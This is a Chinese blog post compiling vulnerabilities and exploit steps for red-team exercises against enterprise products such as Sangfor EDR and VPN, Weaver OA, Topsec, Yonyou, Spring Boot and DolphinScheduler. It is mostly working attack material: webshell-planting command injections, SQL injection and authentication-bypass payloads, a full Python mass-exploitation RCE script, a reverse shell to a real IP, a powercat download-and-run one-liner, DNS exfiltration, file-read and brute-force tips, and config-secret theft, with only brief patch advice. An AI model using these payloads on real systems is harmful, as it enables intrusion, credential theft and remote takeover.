護網中的漏洞

阿新 • • 發佈：2020-10-21

一、齊治堡壘機前遠端命令執行漏洞（CNVD-2019-20835）1、訪問 http://10.20.10.11/listener/cluster_manage.php :返回 "OK".（未授權無需登入）2、訪問如下連結即可獲得getshell，執行成功後，生成PHP一句話馬

https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK" 
|base64${IFS}- d|bash`|${IFS}|echo${IFS}

3.getshell訪問路徑：

/var/www/shterm/resources/qrcode/lbj77.php

https://10.20.10.10/shterm/resources/qrcode/lbj77.php(密碼10086)

據說還是另外一個版本是java的:

POST /shterm/listener/tui_update.php

a=["t';import os;os.popen('whoami')#"]

二、天融信TopApp-LB 負載均衡系統Sql注入漏洞

1.利用POC:POST /acc/clsf/report/datasource.php HTTP/1.1

Host: localhostConnection: closeAccept: text/javascript, text/html, application/xml, text/xml, */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36Accept-Language: zh-CN,zh;q=0.9Content-Type: application/x-www-form-urlencodedt=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@。。

2.2個歷史漏洞仍然可以復現。

https://www.uedbox.com/post/21626/

使用者名稱隨意密碼：;id（天融信負載均衡TopApp-LB系統無需密碼直接登陸）

https://www.uedbox.com/post/22193/使用者名稱:; ping 9928e5.dnslog.info; echo 密碼：任意

三、用友GRP-u8 注入

利用POC:POST /Proxy HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)Host: localhostContent-Length: 341Connection: Keep-AliveCache-Control: no-cache
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'whoami'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

四、綠盟UTS綜合威脅探針管理員任意登入

邏輯漏洞,利用方式參考：https://www.hackbug.net/archives/112.html

1、修改登入資料包 {"status":false,"mag":""} -> {"status":true,"mag":""}

2、/webapi/v1/system/accountmanage/account介面邏輯錯誤洩漏了管理員的賬戶資訊包括密碼（md5）

3、再次登入,替換密碼上個數據包中md5密碼

4、登入成功

漏洞實際案例：對響應包進行修改，將false更改為true的時候可以洩露管理使用者的md5值密碼利用渠道的md5值去登入頁面7ac301836522b54afcbbed714534c7fb

五、天融信資料防洩漏系統越權修改管理員密碼

無需登入許可權,由於修改密碼處未校驗原密碼,且/?module=auth_user&action=mod_edit_pwd，介面未授權訪問,造成直接修改任意使用者密碼，預設superman賬戶uid為1

POST /?module=auth_user&action=mod_edit_pwd

Cookie: username=superman;

uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1

六、WPS Office 圖片解析錯誤導致堆損壞，任意程式碼執行

看上去(算了看不懂... ,漏洞利用可能導致拒絕服務。

相關參考:

http://zeifan.my/security/rce/heap/2020/09/03/wps-rce-heap.html

七、SANGFOR終端檢測響應平臺-任意使用者登入

fofa指紋：title="SANGFOR終端檢測響應平臺"

漏洞利用：
payload：

  https://ip/ui/login.php?user=需登入的使用者名稱

列如：

  https://1.1.1.1:1980/ui/login.php?user=admin

查詢完畢以後即可登入平臺。

八、某信服EDR漏洞-包含payload

1.漏洞利用方法：

https://xxx.xxx.xxx/tool/log/c.php?strip_slashes=system&host=whoami

2.批量利用方法

網上已經放出批量利用方法了，如下：https://github.com/A2gel/sangfor-edr-exploit

# -*- coding: utf-8 -*-

# @Time : 2020/8/17

# @Author : Angel

# @File : edr.py

# 感謝大佬提供Command execute部分程式碼

import requests

import re

import urllib3

import sys

import base64

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def hello():

"""

init function

:return: init print

"""

print (

"""SangFor EDR remote command code exploit

Angel 20200817

Github: https://github.com/A2gel/sangfor-edr-exploit

Command: python edr.py url http://10.10.10.0/

Command: python edr.py file 1.txt whoami""")

def readFile(filename):

"""

逐行讀取檔案內容並返回列表

:param filename: 檔名

:return: 逐行分割的檔案內容

"""

list=[]

keywords = open('./'+filename, 'r')

line = keywords.readline().strip('\n')

while (line):

list.append(line)

line = keywords.readline().strip('\n')

keywords.close()

return list

def log(name,value):

"""

逐行寫入檔案

:param name: 檔名

:param value: 檔案內容

:return: 空

"""

save = file(str(name)+".txt", "a+")

save.write(str(value)+"\n")

save.close()

def rce(host,command):

"""

遠端命令執行核心函式

:param host: URL資訊

:param command: 執行的命令

:return: 成功執行返回命令回顯失敗列印faild 返回-

"""

headers={

'Connection': 'close',

'Cache-Control': 'max-age=0',

'Upgrade-Insecure-Requests': '1',

'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',

'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',

'Sec-Fetch-Site': 'none',

'Sec-Fetch-Mode': 'navigate',

'Sec-Fetch-User': '?1',

'Sec-Fetch-Dest': 'document',

'Accept-Encoding': 'gzip, deflate',

'Accept-Language': 'zh-CN,zh;q=0.9'

}

command=base64.b64encode(command)

command="echo \""+command+"\""+"|base64 -d|bash"

command = command.replace(" ","$IFS")

url="{}/tool/log/c.php?strip_slashes=system&host={}".format(host,command)

#print url

try:

response = requests.get(url,verify=False,headers=headers)

response.raise_for_status()

response.encoding = "utf-8"

#print response.text

res=re.findall(r'<b>Log Helper</b></p>(.+?)<pre><form',response.text,re.S)

response.close()

print(res[0])

return "+"

except:

print('failed')

return "-"

if __name__ == '__main__':

if len(sys.argv) < 2:

hello()

else:

if sys.argv[1] == "url":

while 1:

command = raw_input("Command> ")

if command:

print ("Try %s"%sys.argv[2])

rce(sys.argv[2],command)

else:

print ("Please input Command")

command = ""

elif sys.argv[1] == "file":

if (sys.argv) < 3:

print "Command: python edr.py file url.txt"

else:

for i in readFile(sys.argv[2]):

print ("Try %s"%i)

if rce(i,sys.argv[3]) == "+":

log("success",sys.argv[3])

else:

log("error",sys.argv[3])

else:

hello()

3.使用方法

單個url

python edr.py url http://10.10.10.10

Command> whoami
Try http://10.10.10.10
root

批量url 需要在目錄下建立xxx.txt 一行一個url

python edr.py file 1.txt whoami

Try: http://10.10.10.10
root
Try: http://10.10.10.11
root

九、sangfor EDR RCE漏洞

1.漏洞原理:

dev_linkage_launch.php 為裝置聯動的新入口點主要是將聯動的介面構造成業務統一處理的介面

主要呼叫

跟進

可以看到第一個檢查為 $req_url = $_SERVER['PHP_SELF'];

繞過第一個檢查:

在他們系統nginx配置檔案裡面:

通過nginx規則可以得知,他們沒有設定禁止外網訪問.從而可以直接訪問

/api/edr/sangforinter/v2/xxx 繞過第一個檢查

第二檢查: 許可權檢查

跟進check_access_token

這裡if($md5_str == $json_token["md5"]) 引發第二個漏洞: php弱型別導致的漏洞

繞過只需要傳入一個base64編碼的json內容為 {“md5”:true}即可

至此許可權檢查繞過完畢

來到 process_cssp.php 檔案

存在任意指令執行漏洞.作者試圖使用escapeshellarg函式去給單引號打反斜槓實際上是毫無作用的.

繞過:{"params":"w=123\"'1234123'\"|命令"}

2.利用POC:

post /api/edr/sanforinter/v2/cssp/slog_client?token=ssskbkds HTTP/1.1.

{"params":"w=123\"'1234123'\"|bash -i >/dev/tcp/167.179.118.219/8899 0>&1"}

外網linux反彈監聽NC埠

nc -lvvp 889

深信服EDR 遠端命令執行的技巧：

/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9

{"params": "w=123\"'1234123'\"|curl `whoami`.dnslog.cn"}

十、聯軟科技產品存在任意檔案上傳和命令執行漏洞1.影響範圍:聯軟科技相關產品2.漏洞描述:任意檔案上傳漏洞，存在於使用者自檢報告上傳時，後臺使用黑名單機制對上傳的檔案進行過濾和限制，由於當前黑名單機制存在缺陷，檔案過濾機制可以被繞過，導致存在檔案上傳漏洞；利用該漏洞可以獲取webshell許可權。命令執行漏洞，存在於後臺資源讀取過程中，對於自動提交的使用者可控引數沒有進行安全檢查，可以通過構造特殊引數的資料包，後臺在執行過程中直接執行了提交資料包中的命令引數，導致命令執行漏洞；該漏洞能夠以當前執行的中介軟體使用者許可權執行系統命令，根據中介軟體使用者許可權不同，可以進行新增系統賬戶，使用反彈shell等操作。3.規避措施:建議各單位在修補漏洞前制定詳細的書面方案，方案需要包含升級、業務驗證、回退等內容。升級加固操作建議在業務閒時進行操作，各單位可以分批次，採取先驗證後批量修復的方式開展升級工作。如果在修復時發生異常，建議按照預先制定的應急預案進行回退，確保不影響業務的正常執行。各單位在升級後需進行相關業務驗證，確保本次漏洞臨時修復方案對業務零影響。十一、泛微OA Bsh 遠端程式碼執行漏洞1.漏洞簡介2019年9月17日泛微OA官方更新了一個遠端程式碼執行漏洞補丁, 泛微e-cology OA系統的Java Beanshell介面可被未授權訪問, 攻擊者呼叫該Beanshell介面, 可構造特定的HTTP請求繞過泛微本身一些安全限制從而達成遠端命令執行, 漏洞等級嚴重.2.影響元件：泛微OA3.漏洞指紋Set-Cookie: ecology_JSessionId=ecology/weaver/bsh.servlet.BshServlet4. Fofa Dorkapp="泛微-協同辦公OA"5.漏洞分析https://www.freebuf.com/vuls/215218.htmlhttps://github.com/beanshell/beanshellhttp://beanshell.org/manual/quickstart.html#The_BeanShell_GUI6.漏洞利用利用POC:POST /weaver/bsh.servlet.BshServlet HTTP/1.1Host: xxxxxxxx:8088Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Length: 98Content-Type: application/x-www-form-urlencoded

bsh.script=eval%00("ex"%2b"ec(\"whoami\")");&bsh.servlet.captureOutErr=true&bsh.servlet.output=rawCNVD-2019-32204利用指令碼：
https://github.com/myzing00/Vulnerability-analysis/tree/master/0917/weaver-oa/CNVD-2019-32204

批量指令碼執行：

pip install requests
python Weaver-Ecology-OA_RCE-exp.py 
url.txt檔案中 是url地址 需要帶http協議

7.利用技巧其他形式繞過eval%00("ex"%2b"ec(\"whoami\")");也可以換成ex\u0065c("cmd /c dir");泛微多數都是windows環境, 反彈shell可以使用pcatPowershellIEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p 6666 -e cmd8.防護方法1.及時更新泛微補丁2.攔截/weaver/bsh.servlet.BshServlet目錄的訪問十二、泛微OA e-cology SQL注入漏洞1.漏洞簡介泛微OA在國內的使用者很多,漏洞以前也很多,但現在在漏洞盒子託管了企業SRC： https://weaversrc.vulbox.com/,情況有所好轉2.影響元件泛微OA3.漏洞指紋Set-Cookie: ecology_JSessionId=ecologyWorkflowCenterTreeData/mobile/plugin/SyncUserInfo.jsp4. Fofa Dorkapp="泛微-協同辦公OA"5.漏洞分析泛微OA WorkflowCenterTreeData介面注入漏洞(限oracle資料庫) – 先知社群
https://xz.aliyun.com/t/65316.漏洞利用泛微OA e-cology WorkflowCenterTreeData前臺介面SQL注入漏洞復現：修改NULL後為要查詢的欄位名,修改from後為查詢的表：
POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 2236Connection: closeUpgrade-Insecure-Requests: 1
formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0

https://github.com/orleven/Tentacle/blob/6e1cecd52b10526c4851a26249339367101b3ca2/script/ecology/ecology8_mobile_sql_inject.py #!/usr/bin/env python# -*- coding: utf-8 -*-# @author: 'orleven'
from lib.utils.connect import ClientSessionfrom script import Script, SERVICE_PORT_MAP
class POC(Script): def __init__(self, target=None): self.service_type = SERVICE_PORT_MAP.WEB self.name = 'ecology8 mobile sql inject' self.keyword = ['ecology8', 'sql inject'] self.info = 'ecology8 mobile sql inject' self.type = 'inject' self.level = 'high' Script.__init__(self, target=target, service_type=self.service_type)
async def prove(self): await self.get_url() if self.base_url: path_list = list(set([ self.url_normpath(self.base_url, '/'), self.url_normpath(self.url, './'), ])) pocs = ["mobile/plugin/browser/WorkflowCenterTreeData.jsp?scope=1&node=root_1&formids=1/1&initvalue=1", # 注入點為formids,分母 "mobile/plugin/browser/WorkflowCenterTreeData.jsp?scope=1&node=wftype_6/1&formids=1&initvalue=1"] # 注入點為node,分母 async with ClientSession() as session: for path in path_list: for poc in pocs : url = path + poc
async with session.get(url=url) as res: if res!=None: text = await res.text() if '"draggable":false' in text: self.flag = 1 self.req.append({"url": url}) self.res.append({"info": url, "key": "ecology8 inject"}) return應用安全 – 軟體漏洞 – 泛微OA漏洞彙總：
https://blog.csdn.net/weixin_30855099/article/details/101191532/mobile/plugin/SyncUserInfo.jsp這個也是有問題的, 但由於沒有公開的分析報告, 漏洞相對簡單, 這裡不過多描述7.利用技巧1.在這個漏洞補丁之前大概有幾十個前臺注入, 都差不多, 因為沒公開這裡就不細說了2.泛微的補丁中間改過一次過濾策略, 打完所有補丁的話, 注入就很難了3.這裡可以繞過的原因是泛微某個過濾器初始化錯誤,當長度超過xssMaxLength=500的時候就不進入安全檢測, 修復以後是xssMaxLength=1000000,所以隨便你填充%0a%0d還是空格都可以繞過注入檢測4.泛微後端資料庫版本存在差異, 但是可以通用檢測。已知泛微OA E8存在2個版本的資料庫, 一個是mssql, 一個是oracle, 且新舊版本泛微的sql過濾方法並不一致所以這裡篩選出一個相對通用的檢測手法(下面程式碼是python的" "*800800個空格)"-1) "+" "*800+ "union select/**/1, Null, Null, Null, Null, Null, Null, Null from Hrmresourcemanager where loginid=('sysadmin'"老版本可以在關鍵字後面加/**/來繞過sql檢測新版本可以通過加入大量空格/換行來繞過sql檢測mssql,oracle中都有Hrmresourcemanager,這是管理員資訊表就Hrmresource表中沒有使用者,Hrmresourcemanager表中也一定會存在sysadmin賬戶，所以進行union select的時候一定會有資料。這裡也可以使用"-1) "+" "*800+ " or/**/ 1=1 and id<(5"，這裡使用<5可以避免資訊超過5條, 但是會返回密碼等敏感資訊, 不建議使用。8.防護方法1.及時更新泛微補丁
2.泛微最好不要開放到公網
3.使用waf攔擊十三、深信服VPN遠端程式碼執行1.漏洞簡介深信服 VPN 某個特定產品存在遠端程式碼執行, 2019 攻防演練使用過2.影響元件：深信服 VPN3.漏洞指紋Set-Cookie: TWFID=welcome to ssl vpn Sinfor4. Fofa Dorkheader="Set-Cookie: TWFID="5.漏洞分析深信服vpnweb登入逆向學習：
https://www.cnblogs.com/potatsoSec/p/12326356.html6.漏洞利用wget -t %d -T %d --spider %s7.利用技巧1.該版本深信服VPN屬於相對早期的版本, 大概2008年左右, 但目前還有761個ip開放在公網2.該版本較低,whomai不存在, 可以使用uname,這裡沒有空格可dns傳出來3.去除空格也簡單cat /etc/passwd | tr " \n" "+|"
8.防護方法1.及時更新補丁2.升級到最新版十四、深信服 VPN 口令爆破1.漏洞簡介深信服 VPN 針對口令爆破是5次錯誤鎖定IP五分鐘, 所以這裡爆破也不是不行, 主要是測試常見弱口令以及分散式爆破也不是不行2.影響元件深信服 VPN3.漏洞指紋/por/login_auth.csp?apiversion=1sangfor/cgi-bin/login.cgi?rnd=4. Fofa Dorkapp="深信服-SSL-VPN"5.漏洞分析關於SSL VPN認證時的驗證碼繞過 – SSL VPN/EMM – 深信服社群
https://bbs.sangfor.com.cn/forum.php?mod=viewthread&tid=20633此處存疑, 時間問題沒有測試6.漏洞利用1.深信服VPN 口令爆破 demo (這裡僅測試了M6,其他的應該差不多)#encoding=utf8import requestsimport hashlibimport urllib3urllib3.disable_warnings()import resession = requests.session()def SanForLogin(target, password, username="admin"): #加密密碼的演算法是 sha1(password+sid) #沒有公開POC就不寫了SanForLogin("https://xxxxxxxxxxx/", "admin")7.利用技巧1.由於深信服涉及的版本跨度時間達十幾年, 很多地方不一樣, 但是總體都差不太多國外APT組織應該也批量爆破了一波，加密的密碼也就是sha1(password+sid)爆破也就鎖一會ip, 夜裡丟一邊跑著就完事了, 弱口令也就那麼些admin/123456/Sangfor/Sangfor@1232.如果爆破出來了管理員密碼, 管理員後臺有好多處命令注入, 比如升級工具, 這裡講起來應該是正常功能3.去年傳聞還有前臺sql注入, 但是沒拿到補丁, 手頭沒環境, 就沒分析, 看一下烏雲上的老洞吧。深信服SSLVPN外接資料中心敏感資訊洩漏&SQL注入漏洞可導致getshell
https://www.uedbox.com/post/31092/8.防護方法1.及時更新補丁2.升級到最新版十五、常見邊界產品(防火牆, 閘道器, 路由器, VPN) 弱口令漏洞1.漏洞簡介大型企業往往會配置一些邊界裝置來維護企業內外網通訊, 這裡也存在燈下黑的問題, 由於多數不開源, 漏洞主要以弱口令為主2.影響元件防火牆, 閘道器, 路由器, VPN3.漏洞指紋防火牆, 閘道器, 路由器, VPN4. Fofa Dork防火牆, 閘道器, 路由器, VPN 的名稱5.漏洞利用【安全裝置】常見網路安全裝置預設口令
https://www.it2021.com/security/614.html滲透測試之各廠商防火牆登入IP、初始密碼、技術支援
https://mp.weixin.qq.com/s/OLf7QDl6qcsy2FOqCQ2icA7.利用技巧這個東西好多人不改預設口令, 就算改很多也是企業特色弱口令，adminroot123456永遠的神內網的安全平臺就是個漏洞指南8.防護方法1.設定強口令2.限制來源IP十六、Thinkphp 相關漏洞1.漏洞簡介Thinkphp是國內很常見的PHP框架, 存在遠端程式碼執行/sql注入/反序列化/日誌檔案洩露等問題2.影響元件
Thinkphp3.漏洞指紋Thinkphp X-Powered-By: ThinkPHP4. Fofa Dorkapp="ThinkPHP"5.漏洞分析ThinkPHP漏洞總結 – 賽克社群
http://zone.secevery.com/article/1165挖掘暗藏ThinkPHP中的反序列利用鏈：
https://blog.riskivy.com/%E6%8C%96%E6%8E%98%E6%9A%97%E8%97%8Fthinkphp%E4%B8%AD%E7%9A%84%E5%8F%8D%E5%BA%8F%E5%88%97%E5%88%A9%E7%94%A8%E9%93%BE/ThinkPHP使用不當可能造成敏感資訊洩露：
https://blog.csdn.net/Fly_hps/article/details/81201904DSMall程式碼審計：
https://www.anquanke.com/post/id/2034616.漏洞利用SkyBlueEternal/thinkphp-RCE-POC-Collection: thinkphp v5.x遠端程式碼執行漏洞-POC集合
https://github.com/SkyBlueEternal/thinkphp-RCE-POC-CollectionDido1960/thinkphp: thinkphp反序列化漏洞復現及POC編寫
https://github.com/Dido1960/thinkphpwhirlwind110/tphack: Thinkphp3/5 Log檔案洩漏利用工具
https://github.com/whirlwind110/tphack7.利用技巧1.遇到Thinkphp的站點看一下版本, 或者直接掃一下, 看看有沒有rce, 或者日誌檔案洩露2.自從挖了thinphp的反序列化利用鏈以後, 這型別考題經常出沒在ctf中3.實戰中也看到偶爾有可以利用的情況, 運氣好可能有驚喜, 剛好有篇新出的文章中使用到了這個漏洞DSMall程式碼審計 – 安全客，安全資訊平臺
https://www.anquanke.com/post/id/2034618.防護方法1.及時更新補丁2.升級到最新版Thinkphp3.前置WAF進行防護十七、Spring 系列漏洞1.漏洞簡介Spring是java web裡最最最最常見的元件了, 自然也是研究的熱門, 好用的漏洞主要是Spring Boot Actuators 反序列化, 火起來之前用了一兩年, 效果很棒2.影響元件
Spring xxx3.漏洞指紋X-Application-Context:4. Fofa Dorkapp="Spring-Framework"5.漏洞分析Spring框架漏洞集合：
https://misakikata.github.io/2020/04/Spring-%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/Exploiting Spring Boot Actuators | Veracode blog
https://www.veracode.com/blog/research/exploiting-spring-boot-actuatorsSpring Boot Actuators配置不當導致RCE漏洞復現：
https://jianfensec.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Spring%20Boot%20Actuators%E9%85%8D%E7%BD%AE%E4%B8%8D%E5%BD%93%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/6.漏洞利用mpgn/Spring-Boot-Actuator-Exploit: Spring Boot Actuator (jolokia) XXE/RCE
https://github.com/mpgn/Spring-Boot-Actuator-Exploitartsploit/yaml-payload: A tiny project for generating SnakeYAML deserialization payloads
https://github.com/artsploit/yaml-payload7.利用技巧1.Spring Boot Actuators相關漏洞超級好用，很多廠商一開始都不懂, 直接對外開放Spring Boot Actuators,造成了有一段時間每個用了Spring Boot的廠商都出了問題，尤其是現在很多廠商使用微服務框架, 通過閘道器進行路由分發, 一些子目錄通常對應一個Spring Boot啟動的服務。然後子目錄比如http://123.123.123.123/admin/env,http://123.123.123.123/manager/env也都是可以出現的/env可以偷session, RCE/heapdump可以直接dump jvm中的物件, 使用 jhat 可以讀取裡面的物件可以遍歷如下的endpoint, 1.x 2.x的目錄不一樣, 所以都覆蓋了一下/trace/health/loggers/metrics/autoconfig/heapdump/threaddump/env/info/dump/configprops/mappings/auditevents/beans/jolokia/cloudfoundryapplication/hystrix.stream/actuator/actuator/auditevents/actuator/beans/actuator/health/actuator/conditions/actuator/configprops/actuator/env/actuator/info/actuator/loggers/actuator/heapdump/actuator/threaddump/actuator/metrics/actuator/scheduledtasks/actuator/httptrace/actuator/mappings/actuator/jolokia/actuator/hystrix.stream/monitor/monitor/auditevents/monitor/beans/monitor/health/monitor/conditions/monitor/configprops/monitor/env/monitor/info/monitor/loggers/monitor/heapdump/monitor/threaddump/monitor/metrics/monitor/scheduledtasks/monitor/httptrace/monitor/mappings/monitor/jolokia/monitor/hystrix.stream這裡通過/env+/refresh進行rce應該還有其他利用手法, 當spring boot reload的時候會進行一些預設操作，裡面就有操作空間, 很像fastjson反序列化。2.就算實在不能RCE, 這裡也有個技巧可以偷取 Spring 配置檔案中的加密欄位, 偷一下生產環境的密碼/key也okeureka.client.serviceUrl.defaultZone=http://${somedb.pasword}@127.0.0.1:5000spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml3.尤其是使用spring eureka做叢集的時候, 通常拿到一臺伺服器, 就可以傳遞惡意註冊到其他server, 從而感染整個微服務叢集eureka通常是 server 也是 client, 無論對方請求什麼都直接返回惡意序列化xml就可以了8.防護方法1.及時更新補丁2.開啟Spring Boot Actuators許可權校驗3.前置WAF進行防護十八、Solr 系列漏洞1.漏洞簡介Solr是企業常見的全文搜尋服務, 這兩年也爆出很多安全漏洞,2.影響元件Solr3.漏洞指紋Solr4. Fofa Dorkapp="Solr"5.漏洞分析Apache Solr最新RCE漏洞分析 – FreeBuf網際網路安全新媒體平臺
https://www.freebuf.com/vuls/218730.htmlApache Solr DataImportHandler遠端程式碼執行漏洞(CVE-2019-0193) 分析
https://paper.seebug.org/1009/6.漏洞利用veracode-research/solr-injection: Apache Solr Injection Research
https://github.com/veracode-research/solr-injectionjas502n/CVE-2019-12409: Apache Solr RCE (ENABLE_REMOTE_JMX_OPTS=”true”)
https://github.com/jas502n/CVE-2019-12409mogwailabs/mjet: MOGWAI LABS JMX exploitation toolkit
https://github.com/mogwailabs/mjet7.利用技巧1.看到錘就完事了, 漏洞太多了, 一片一片的2.遇到mjet連線超時,這是目標服務起返回了錯誤的stub(內網地址, 常見於docker), 可以使用socat進行流量轉發, 後記裡面有具體操作8.防護方法1.升級到最新版2.不要對外開放敏感埠十九、Ghostscript 上傳圖片程式碼執行1.漏洞簡介Ghostscript是影象處理中十分常用的庫, 整合在imagemagick等多個開源元件中, 其 .ps檔案存在沙箱繞過導致程式碼執行的問題影響廣泛, 由於上傳圖片就有可能程式碼執行, 很多大廠中招2.影響元件imagemagick, libmagick, graphicsmagick, gimp, python-matplotlib, texlive-core, texmacs, latex2html, latex2rtf等影象處理應用3.漏洞指紋.ps/.jpg/.png4. Fofa Dork5.漏洞分析ghostscript命令執行漏洞預警
https://www.anquanke.com/post/id/1575136.漏洞利用Exploit Database Search
https://www.exploit-db.com/search?q=Ghostscriptvulhub/ghostscript/CVE-2019-6116 at master· vulhub/vulhub
https://github.com/vulhub/vulhub/tree/master/ghostscript/CVE-2019-61167.利用技巧1.如果發現網站可以上傳圖片, 且圖片沒有經過裁剪, 最後返回縮圖, 這裡就可能存在Ghostscript 上傳圖片程式碼執行dnslog可以用ping `uname`.admin.ceye.io或ping `whoami`.admin.ceye.io儲存成圖片, 以後用起來方便, 有個版本的 centos 和 ubuntu poc還不一樣, 可以這樣構造ping `whoami`.centos.admin.ceye.io/ping `whoami`.ubuntu.admin.ceye.io分別命名為centos_ps.jpg/ubuntu_ps.jpg,這樣測試的時候直接傳2個檔案, 通過DNSLOG可以區分是哪個poc執行的8.防護方法1.升級到最新版二十、泛微雲橋復現1.其實沒什麼復現的。。。未授權讀取。直接呼叫exp就OKhttp://www.xxx.com/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt http://www.xxx.com/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt2.任意讀取linux的passwd值可在響應包中JSON中包含ID的32位值再次請求可獲得/etc/passwd值http://www.xxx.com/FileNoLogin/32位MD5值http://www.xxx.com/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
3.任意讀取winodws下的win.ini值未授權任意檔案讀取,/wxjsapi/saveYZJFile介面獲取filepath,返回資料包內出現了程式的絕對路徑,攻擊者可以通過返回內容識別程式執行路徑從而下載資料庫配置檔案危害可見。
1.downloadUrl引數修改成需要獲取檔案的絕對路徑,記錄返回包中的id值。http://www.xxx.com/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt
2.通過檢視檔案介面訪問 /file/fileNoLogin/id

3.其他利用技巧（讀取任意目錄檔案）簡單說說昨天泛微雲橋的報告,輸入檔案路徑->讀取檔案內容,我們讀了一下程式碼後發現這還能讀取檔案目錄。引數不填寫絕對路徑寫進文字內容就是當前的目錄,產生了一個新的漏洞 “目錄遍歷”/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///D:/&fileExt=txt
目錄遍歷+檔案讀取,我們能做的事情就很多了,比如讀取管理員在桌面留下的密碼檔案、資料庫配置檔案、nginx代理配置、訪問日誌、D盤迅雷下載：d://ebridge//tomcat//webapps//ROOT//WEB-INF//classes//init.properties
d:/OA/tomcat8/webapps/OAMS/WEB-INF/classes/dbconfig.properties 泛微OA資料庫
4.修復建議:關閉程式路由 /file/fileNoLogin二十一、網瑞達webVPN RCE漏洞1.漏洞描述WebVPN是提供基於web的內網應用訪問控制，允許授權使用者訪問只對內網開放的web應用，實現類似VPN（虛擬專用網）的功能。近日網瑞達的webVPN被曝出存在RCE的漏洞。修復建議建議去官網更新最新版本二十二、Apache DolphinScheduler高危漏洞（CVE-2020-11974、CVE-2020-13922）
1.漏洞描述Apache軟體基金會發布安全公告，修復了Apache DolphinScheduler許可權覆蓋漏洞（CVE-2020-13922）與Apache DolphinScheduler遠端執行程式碼漏洞（CVE-2020-11974）。CVE-2020-11974與mysql connectorj遠端執行程式碼漏洞有關，在選擇mysql作為資料庫時，攻擊者可通過jdbc connect引數輸入{“detectCustomCollations”:true，“ autoDeserialize”:true}在DolphinScheduler 伺服器上遠端執行程式碼。CVE-2020-13922導致普通使用者可通過api interface在DolphinScheduler 系統中覆蓋其他使用者的密碼：api interface /dolphinscheduler/users/update，請相關使用者及時升級進行防護。2.影響範圍ApacheDolphinScheduler許可權覆蓋漏洞（CVE-2020-13922）3.受影響版本ApacheDolphinScheduler = 1.2.0、1.2.1、1.3.14.不受影響版本ApacheDolphinScheduler>=1.3.2ApacheDolphinScheduler遠端執行程式碼漏洞（CVE-2020-11974）5.利用POC:

POST /dolphinscheduler/users/update
id=1&userName=admin&userPassword=Password1!&tenantId=1&email=sdluser%40sdluser.sdluser&phone=

利用漏洞:需要登入許可權,提供一組預設密碼。

該漏洞存在於資料來源中心未限制新增的jdbc連線引數,從而實現JDBC客戶端反序列化。

1、登入到面板 -> 資料來源中心。

2、jdbc連線引數就是主角,這裡沒有限制任意型別的連線串引數。

3、將以下資料新增到jdbc連線引數中,就可以直接觸發。

POST /dolphinscheduler/datasources/connect HTTP/1.1

type=MYSQL&name=test&note=&host=127.0.0.1&port=3306&database=test&

principal=&userName=root&password=root&connectType=&

other={"detectCustomCollations":true,"autoDeserialize":true}

關於MySQL JDBC客戶端反序列化漏洞的相關參考：

https://www.anquanke.com/post/id/203086

5.修復建議官方升級目前官方已在最新版本中修復了此次的漏洞，請受影響的使用者儘快升級版本至1.3.2進行防護，官方下載連結：https://dolphinscheduler.apache.org/zhcn/docs/release/download.html二十三、寶塔面板phpMyadmin未授權訪問
